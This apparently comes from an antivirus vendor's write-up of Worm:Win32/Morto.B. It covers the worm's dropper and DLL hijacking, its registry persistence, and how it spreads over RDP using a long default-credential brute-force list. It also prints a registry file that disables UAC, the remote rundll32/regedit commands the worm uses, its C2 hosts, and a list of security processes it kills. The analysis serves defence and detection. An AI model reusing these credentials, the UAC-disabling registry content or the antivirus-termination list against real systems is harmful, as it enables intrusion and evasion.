Worm:Win32/Morto.B is a worm that allows unauthorized access to an affected computer. It spreads by trying to gain administrator privileges for Remote Desktop connections on a network.
Installation
Worm:Win32/Morto.B consists of several components, including the following:
- An executable dropper component (the installer)
- The encrypted binary blob payload stored in the Windows Registry
- A DLL component, which performs the payload
When the dropper is executed, the DLL component is installed as the following files:
- %windir%\clb.dll
- %windir%\offline web pages\cache.txt
If updated by the malware, a back-up of the first file is created as "clb.dll.bak".
Note that a legitimate file also named "clb.dll" exists by default in the Windows system folder. Because of how files in Windows are searched for and run, the malware file "clb.dll" is actually run instead of the legitimate file.
The dropper also writes the encrypted binary blob to the registry key HKLM\SYSTEM\WPA\md and exits.
Worm:Win32/Morto.B also creates the following file:
- %windows%\temp\ntshrui.dll
It renames the following legitimate files:
- <system folder>\sens.dll to <system folder>\sens32.dll
- <system folder>\ntmssvc.dll to <system folder>\ntmssvc32.dll
Note: <system folder> refers to a variable location that is determined by the malware by querying the Operating System. The default installation location for the System folder for Windows 2000 and NT is C:\Winnt\System32; and for XP, Vista, and 7 is C:\Windows\System32.
It then overwrites these renamed files with malicious code.
It also creates the following registry modifications to load its modified DLL files at every Windows start:
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\6to4\Parameters
Sets value: "ServiceDll"
With data: "%windir%\temp\ntshrui.dll"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\6to4
Sets value: "Description"
With data: "0"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\Sens
Sets value: "DependOnService"
With data: "0"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\Sens\Parameters
Sets value: "ServiceDll"
With data: "<system folder>\sens32.dll"
In subkey: HKLM\SYSTEM\CurrentControlSet\Services\NtmsSvc\Parameters
Sets value: "ServiceDll"
With data: "<system folder>\NtmsSvc32.dll"
Spreads via...
Network access via RDP port 3389
Worm:Win32/Morto.B enumerates IP addresses on the affected computer's subnet and attempts to connect to these computers using the following user names and passwords:
User name: "administrator"
Passwords:
- !@#$
- !@#$%
- !@#$%^
- !@#$%^&*
- <user name>
- <user name>1
- <user name>111111
- <user name>12
- <user name>123
- <user name>1234
- <user name>123456
- 0
- 000000
- 1
- 111
- 1111
- 111111
- 1111111
- 111222
- 112233
- 11223344
- 12
- 121212
- 123
- 123123
- 123321
- 12344321
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 1234qwer
- 1313
- 1314520
- 159357
- 168168
- 1QAZ
- 1q2w3e
- 1qaz2wsx
- 2010
- 2011
- 2012
- 2222
- 22222222
- 3
- 31415926
- 369
- 4321
- 520
- 520520
- 654321
- 666666
- 7
- 7777
- 7777777
- 77777777
- 789456
- 888888
- 88888888
- 987654
- 987654321
- 999999
- PASSWORD
- Password
- Z1234
- a
- aaa
- abc
- abc123
- abcd
- abcd1234
- admin
- admin123
- computer
- dragon
- iloveyou
- letmein
- pass
- password
- princess
- qazwsx
- rockyou
- root
- secret
- server
- super
- test
- user
- zxcvbnm
User name: "user"
Passwords:
- $1234
- <user name>
- <user name>12
- <user name>1234
- 0
- 000000
- 1
- 111
- 1111
- 111111
- 123
- 123123
- 123321
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- 1234567890
- 1234qwer
- 1q2w3e
- 1qaz2wsx
- 369
- 520520
- 654321
- 888888
- a
- aaa
- abc123
- abcd1234
- admin123
- letmein
- pass
- password
- server
- test
User names: "user1" and "test"
Passwords:
- <user name>
- <user name>1234
- 0
- 1
- 111
- 1111
- 111111
- 123
- 123123
- 123321
- 1234
- 12345
- 123456
- 12345678
- 123456789
- 1qaz2wsx
- 888888
- a
- abc123
- letmein
- pass
- password
- server
- test
User names: "user2", "test1", "user3", and "admin1"
Passwords:
- <user name>
- 1
- 111111
- 123
- 1234
- 12345
- 123456
- 12345678
- 1qaz2wsx
- letmein
- password
- server
User names:
- 1
- 123
- a
- actuser
- adm
- admin2
- aspnet
- backup
- console
- david
- guest
- john
- owner
- root
- server
- sql
- support
- support_388945a0
- sys
- test2
- test3
- user4
- user5
Passwords:
- <user name>
- 1
- 123
- 1234
- 123456
- password
where "<user name>" is the user name being used in the combination.
If the worm successfully logs on to a computer, it copies its DLL component "clb.dll" into the accessed computer as "a.dll". It also creates a REG file named "r.reg" in a folder that is mapped to drive A:. Both of these files are remotely executed from the affected computer using the following commands:
rundll32 \\\\tsclient\\a\\a.dll a\r
regedit /s \\\\tsclient\\a\\r.reg\r
The file r.reg, contains the following:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:0
"EnableLUA"=dword:0
[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"c:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"d:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"e:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"f:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"g:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"h:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"i:\\windows\\SysWOW64\\rundll32.exe"="RUNASADMIN"
"c:\\winnt\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2008\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win2k8\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\win7\\system32\\rundll32.exe"="RUNASADMIN"
"c:\\windows7\\system32\\rundll32.exe"="RUNASADMIN"
The intention of the REG file is to modify the registry and ensure that the legitimate file "rundll32.exe" runs with Administrator privileges. Because the malware DLL file "clb.dll" is run within the context of "rundll32.exe", then this implies that it runs with Administrator privileges as well.
Payload
Contacts remote host
Worm:Win32/Morto.B connects to the following hosts to download additional information and update its components:
- sc.j<removed>mt.net
- fc<random number>d.j<removed>mt.net
Newly downloaded components are saved as files using the following naming format:
<random characters>~MTMP<4 hexadecimal digits>.exe
Performs denial of service attacks
Worm:Win32/Morto.B may be ordered to perform denial-of-service (DoS) attacks against specified targets.
Terminates security processes
Worm:Win32/Morto.B terminates processes that contain the following strings in their name. The selected strings indicate that the worm is attempting to stop processes related to popular security-related applications.
- 360rp
- ACAAS
- ArcaConfSV
- AvastSvc
- FPAVServer
- FortiScand
- GDFwSvc
- K7RTScan
- KVSrvXP
- MPSvc
- MsMpEng
- NSESVC.EXE
- PavFnSvr
- RavMonD
- SavService
- SpySweeper
- Vba32Ldr
- a2service
- avguard
- avgwdsvc
- avpmapp
- ccSvcHst
- cmdagent
- coreServiceShell
- freshclam
- fsdfwd
- knsdave
- kxescore
- mcshield
- scanwscs
- vsserv
- zhudongfangyu
Clears system event log
Worm:Win32/Morto.B deletes the following system event logs:
- Application log
- Security log
- System log
Additional information
Worm:Win32/Morto.B stores configuration data in the subkey HKLM\SYSTEM\Wpa using the following registry values:
- HKLM\SYSTEM\Wpa\it
- HKLM\SYSTEM\Wpa\id
- HKLM\SYSTEM\Wpa\sn
- HKLM\SYSTEM\Wpa\ie
- HKLM\SYSTEM\Wpa\md - contains the malware payload code and spreading functionality
- HKLM\SYSTEM\Wpa\sr
It also makes the following registry modification:
In subkey: HKLM\SYSTEM\CurrentControlSet\Control\Windows
Sets value: "NoPopUpsOnBoot"
With data: "1"
It may also target the following services to overwrite with its malicious code:
It contains the version information "2.05".
Analysis by Zarestel Ferrer